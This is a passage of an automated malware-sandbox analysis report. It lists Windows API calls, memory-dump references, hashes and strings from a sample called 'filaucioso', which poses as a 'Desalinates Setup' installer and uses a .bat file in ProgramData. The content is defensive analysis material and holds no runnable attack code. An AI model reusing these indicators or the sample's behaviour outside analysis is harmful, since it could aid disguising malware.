                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                        • String ID:
                                                                        • API String ID: 2972824698-0
                                                                        • Opcode ID: ab329a5fbe1a2bb80e6d7f0c1e62c441a25b0281b2f032684fa4d7b26fa7afa5
                                                                        • Instruction ID: 492013b03639ae684c90f9e5668eb43d68f0c3151a551265a361b9bf3657de6d
                                                                        • Opcode Fuzzy Hash: ab329a5fbe1a2bb80e6d7f0c1e62c441a25b0281b2f032684fa4d7b26fa7afa5
                                                                        • Instruction Fuzzy Hash: 44F09072A04111EBCF11BBA59A859EE72A8DB41318F11017FF901B72D2C37C4A429AAE
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 4a6513538906c2ad888d603f4eec974da145158fa5c322b66a4fc234cd88381b
                                                                        • Instruction ID: 58a32f90f567def110640d9dc390567cb18a6fab0a7cd362fc6929561968ffa9
                                                                        • Opcode Fuzzy Hash: 4a6513538906c2ad888d603f4eec974da145158fa5c322b66a4fc234cd88381b
                                                                        • Instruction Fuzzy Hash: D3D05E73A10201CBD701EBB8AE8485E73B8E7513157204837D542F2191E6B8C9428628
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003FB), ref: 0040455C
                                                                        • SetWindowTextA.USER32(00000000,?), ref: 00404586
                                                                        • SHBrowseForFolderA.SHELL32(?,0079E920,?), ref: 00404637
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404642
                                                                        • lstrcmpiA.KERNEL32(Call,0079F548), ref: 00404674
                                                                        • lstrcatA.KERNEL32(?,Call), ref: 00404680
                                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404692
                                                                          • Part of subcall function 004056ED: GetDlgItemTextA.USER32(?,?,00000400,004046C9), ref: 00405700
                                                                          • Part of subcall function 00406257: CharNextA.USER32(?,*?|<>/":,00000000,"C:\ProgramData\filaucioso.bat" ,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
                                                                          • Part of subcall function 00406257: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
                                                                          • Part of subcall function 00406257: CharNextA.USER32(?,"C:\ProgramData\filaucioso.bat" ,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
                                                                          • Part of subcall function 00406257: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062D1
                                                                        • GetDiskFreeSpaceA.KERNEL32(0079E518,?,?,0000040F,?,0079E518,0079E518,?,?,0079E518,?,?,000003FB,?), ref: 00404750
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040476B
                                                                          • Part of subcall function 004048C4: lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
                                                                          • Part of subcall function 004048C4: wsprintfA.USER32 ref: 0040496A
                                                                          • Part of subcall function 004048C4: SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: A$C:\Users\user\AppData\Local\Temp\unscorified$Call
                                                                        • API String ID: 2624150263-2912053467
                                                                        • Opcode ID: 426c689e6bfd3f7724a5f807d599469a9c9a79d675bf4b1419e56df68b0f1dd0
                                                                        • Instruction ID: c53a8e09cffb511e2e8442f8e0ee4109053d5ca2156788ad792cf5210b9728ca
                                                                        • Opcode Fuzzy Hash: 426c689e6bfd3f7724a5f807d599469a9c9a79d675bf4b1419e56df68b0f1dd0
                                                                        • Instruction Fuzzy Hash: F4A17FB1900209ABDB11AFA5CD45AAFB7B8EF85314F14843BF601B62D1D77C8A418F69
                                                                        APIs
                                                                          • Part of subcall function 6E3A1215: GlobalAlloc.KERNEL32(00000040,6E3A1233,?,6E3A12CF,-6E3A404B,6E3A11AB,-000000A0), ref: 6E3A121D
                                                                        • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6E3A1BC4
                                                                        • lstrcpyA.KERNEL32(00000008,?), ref: 6E3A1C0C
                                                                        • lstrcpyA.KERNEL32(00000408,?), ref: 6E3A1C16
                                                                        • GlobalFree.KERNEL32(00000000), ref: 6E3A1C29
                                                                        • GlobalFree.KERNEL32(?), ref: 6E3A1D09
                                                                        • GlobalFree.KERNEL32(?), ref: 6E3A1D0E
                                                                        • GlobalFree.KERNEL32(?), ref: 6E3A1D13
                                                                        • GlobalFree.KERNEL32(00000000), ref: 6E3A1EFA
                                                                        • lstrcpyA.KERNEL32(?,?), ref: 6E3A2098
                                                                        • GetModuleHandleA.KERNEL32(00000008), ref: 6E3A2114
                                                                        • LoadLibraryA.KERNEL32(00000008), ref: 6E3A2125
                                                                        • GetProcAddress.KERNEL32(?,?), ref: 6E3A217E
                                                                        • lstrlenA.KERNEL32(00000408), ref: 6E3A2198
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2063049847.000000006E3A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E3A0000, based on PE: true
                                                                        • Associated: 00000001.00000002.2063032692.000000006E3A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063063793.000000006E3A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063077518.000000006E3A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6e3a0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                        • String ID:
                                                                        • API String ID: 245916457-0
                                                                        • Opcode ID: a3a89e116ae7fc054857da0ccfbbebb3f8200b8d05dff2de8ab76fcb89e0a115
                                                                        • Instruction ID: 4c9b5679281c323b03873f75f2300844c62ba5d79a8ea8e6754c1d482386d13b
                                                                        • Opcode Fuzzy Hash: a3a89e116ae7fc054857da0ccfbbebb3f8200b8d05dff2de8ab76fcb89e0a115
                                                                        • Instruction Fuzzy Hash: CB22ABB195420ADEDB50CFEEC9847EEBBF9FB06304F10456AD2A2A3180D77555C9CB60
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00408410,?,?,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021BA
                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens, xrefs: 004021FA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens
                                                                        • API String ID: 123533781-141257294
                                                                        • Opcode ID: 8c1491b70ee9da71462547a4ad139fcbd62dd758efc4c42bbf0e79f38f17cd9a
                                                                        • Instruction ID: b20e6ddc0005349e031541e3270fed9150ef90c2934288fc693311ea7f84ec63
                                                                        • Opcode Fuzzy Hash: 8c1491b70ee9da71462547a4ad139fcbd62dd758efc4c42bbf0e79f38f17cd9a
                                                                        • Instruction Fuzzy Hash: 1F511871A00209AFCF00DFE4C988A9D7BB5FF48314F2085AAF515EB2D1DB799941CB54
                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: 7e2d6c76972bccc6bfe42acd4d5d1ed274f309eaf3cef67224d7e78ff27b17ad
                                                                        • Instruction ID: 242f43cfa1d4ef5d1935b54718e26804d33959e399511836c9edd6ef5d071c48
                                                                        • Opcode Fuzzy Hash: 7e2d6c76972bccc6bfe42acd4d5d1ed274f309eaf3cef67224d7e78ff27b17ad
                                                                        • Instruction Fuzzy Hash: 5AF0A0725441009BD701EBB49A49AEEB768AF26324F6041BBE141F21C1D6B889459B6A
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404A97
                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404AA4
                                                                        • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404AF3
                                                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404B0A
                                                                        • SetWindowLongA.USER32(?,000000FC,00405088), ref: 00404B24
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B36
                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B4A
                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404B60
                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6C
                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B7C
                                                                        • DeleteObject.GDI32(00000110), ref: 00404B81
                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAC
                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BB8
                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C52
                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404C82
                                                                          • Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,?,00403EE0), ref: 004040BE
                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C96
                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404CC4
                                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CD2
                                                                        • ShowWindow.USER32(?,00000005), ref: 00404CE2
                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DDD
                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E42
                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E57
                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E7B
                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E9B
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404EB0
                                                                        • GlobalFree.KERNEL32(?), ref: 00404EC0
                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F39
                                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404FE2
                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FF1
                                                                        • InvalidateRect.USER32(?,00000000,?), ref: 00405011
                                                                        • ShowWindow.USER32(?,00000000), ref: 0040505F
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 0040506A
                                                                        • ShowWindow.USER32(00000000), ref: 00405071
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N
                                                                        • API String ID: 2564846305-813528018
                                                                        • Opcode ID: 21134a8715fb0f3faf1c9c54640a0aa9d3ab0ad6357815c91f4f9f85ad6b74aa
                                                                        • Instruction ID: a268e52f59abad667f40846b9330857a26eef97fbfd8c04b7b0b2c1eeebe026e
                                                                        • Opcode Fuzzy Hash: 21134a8715fb0f3faf1c9c54640a0aa9d3ab0ad6357815c91f4f9f85ad6b74aa
                                                                        • Instruction Fuzzy Hash: 56026DB0900209EFEB109FA8DD45AAE7BB5FB84314F10813AF610B62E1D7789D52DF58
                                                                        APIs
                                                                        • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404271
                                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404285
                                                                        • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004042A3
                                                                        • GetSysColor.USER32(?), ref: 004042B4
                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004042C3
                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004042D2
                                                                        • lstrlenA.KERNEL32(?), ref: 004042D5
                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042E4
                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042F9
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040435B
                                                                        • SendMessageA.USER32(00000000), ref: 0040435E
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404389
                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004043C9
                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 004043D8
                                                                        • SetCursor.USER32(00000000), ref: 004043E1
                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004043F7
                                                                        • SetCursor.USER32(00000000), ref: 004043FA
                                                                        • SendMessageA.USER32(00000111,?,00000000), ref: 00404426
                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040443A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                        • String ID: Call$N
                                                                        • API String ID: 3103080414-3438112850
                                                                        • Opcode ID: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
                                                                        • Instruction ID: a3db5b80d5f6c8d56f7a184239f37e003a0a90a84a660de175ffc46cbe068f47
                                                                        • Opcode Fuzzy Hash: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
                                                                        • Instruction Fuzzy Hash: D361B5B1A40204BFEF109F60DD45F6A7B69FB84704F10802AFB05BA1D1C7B8A951CF99
                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextA.USER32(00000000,Desalinates Setup,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: Desalinates Setup$F
                                                                        • API String ID: 941294808-3598714662
                                                                        • Opcode ID: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
                                                                        • Instruction ID: 1ef7ef1d3183d2fe833be2fdc16277d02f602c466de40d92ea6efb336f18bcfe
                                                                        • Opcode Fuzzy Hash: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
                                                                        • Instruction Fuzzy Hash: 53417C71400249AFCB058FA5DE459BF7BB9FF45314F00802EF9A1AA1A0C778DA55DFA4
                                                                        APIs
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405DED,?,?), ref: 00405C8D
                                                                        • GetShortPathNameA.KERNEL32(?,007A12D8,00000400), ref: 00405C96
                                                                          • Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AFB
                                                                          • Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B2D
                                                                        • GetShortPathNameA.KERNEL32(?,007A16D8,00000400), ref: 00405CB3
                                                                        • wsprintfA.USER32 ref: 00405CD1
                                                                        • GetFileSize.KERNEL32(00000000,00000000,007A16D8,C0000000,00000004,007A16D8,?,?,?,?,?), ref: 00405D0C
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D1B
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D53
                                                                        • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,007A0ED8,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405DA9
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405DBA
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DC1
                                                                          • Part of subcall function 00405B86: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\ProgramData\filaucioso.bat,80000000,00000003), ref: 00405B8A
                                                                          • Part of subcall function 00405B86: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405BAC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
